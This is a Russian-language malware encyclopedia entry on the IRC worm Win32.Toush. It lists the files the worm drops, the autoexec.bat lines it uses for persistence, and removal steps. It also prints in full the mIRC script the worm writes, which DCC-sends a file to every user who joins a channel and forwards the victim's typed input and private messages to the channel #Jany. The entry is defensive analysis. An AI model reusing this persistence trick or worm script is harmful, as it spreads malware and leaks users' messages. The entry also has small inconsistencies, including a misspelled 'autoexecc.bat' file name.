IRC-Worm.Win32.Toush

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm.Win32.Toush Троянская программа, распространяющая себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 35 328 байт.

Содержание

Инсталляция

Проверяет существование одного из файлов:

C:\mirc\mirc32.exe
C:\mirc32\mirc32.exe
C:\mirc\mirc32.exe
C:\irc\mirc32.exe
C:\chat\mirc32.exe

если файл существует, то копирует свой исполняемый файл как: 

%System32%\q160301.exe
%System%\krnl.dll

Записывает следующие строки в файл c:\autoexec.bat: 

@echo off
@if not exist C:\WINDOWS\system32\q160301.exe copy C:\WINDOWS\system32\krnl.dll C:\WINDOWS\system32\q160301.exe
@cls

Данный пакетный файл копирует тело червя из 

%System32%\q160301.exe

в 

%System%\krnl.dll

при каждой загрузке ОС а так же запускает исполняемый файл червя.

Деструктивная активность

Записывает следующие строки: 

[SCRIPT]
n0=on 1:start:{
n1= .remote on
n2= .ctcps on
n3= .events on
n4= }
n5=on 1:join:#:{
n6=if ( $nick == $me ) { halt } | .dcc send $nick c:\mirc\CuteJany.doc
n7= }
n8=on 1:connect:.msg #trojanslair,#ad&d_fr,#vxtrader,#vx-vtc,#programmeur,#vir,#Jany,#stereolab
n9=on 1:input:*:.msg #Jany [( $+ $active $+ ) $1-]
n10=on 1:text:*:?:.msg #Jany [( $+ $active $+ ) $1-]

в один из файлов, в зависимости от того какой существует: 

C:\mirc\script.ini
C:\mirc32\script.ini
C:\mirc\script.ini
C:\irc\script.ini
C:\chat\script.ini

Данный скрипт рассылает файл c:\mirc\CuteJany.doc по сервису DCC всем присоединяющимся к каналу клиентам.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи ("Диспетчера задач") завершить процесс червя.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить файлы:
    4. %System32%\q160301.exe
%System%\krnl.dll
  4. Удалить строки:
    5. @echo off
@if not exist C:\WINDOWS\system32\q160301.exe copy C:\WINDOWS\system32\krnl.dll C:\WINDOWS\system32\q160301.exe
@cls

из файла c:\autoexecc.bat

Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.Win32.Toush»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.